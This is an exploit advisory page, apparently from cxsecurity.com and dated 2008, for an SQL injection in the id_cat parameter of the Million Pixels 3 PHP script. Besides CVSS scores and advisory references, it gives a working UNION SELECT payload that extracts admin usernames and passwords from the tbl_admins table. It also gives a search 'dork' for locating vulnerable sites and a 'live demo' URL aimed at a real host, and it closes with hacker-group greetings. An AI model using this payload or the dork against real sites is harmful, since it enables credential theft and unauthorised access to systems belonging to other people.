Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

2008.07.18
Credit: Hussin X
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################# # # Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability # #======================================================== # = # Author: Hussin X = # = # Home : www.tryag.cc/cc # = # email: darkangel_g85[at]Yahoo[DoT]com = # = # = #======================================================== # # script : http://e-topbiz.com/oprema/pages/millionpixels3.php # # DorK : inurl: "tops_top.php? id_cat =" ################################################################# Exploit: www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* L!VE DEMO: http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/* ########################( Greetz )########################### # # # tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # # # # Iraqihack / FAHD / mos_chori / Silic0n # # # ############################################################# Im IRAQi

References:

http://xforce.iss.net/xforce/xfdb/43729
http://www.securityfocus.com/bid/30190
http://www.milw0rm.com/exploits/6044
http://secunia.com/advisories/31059


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top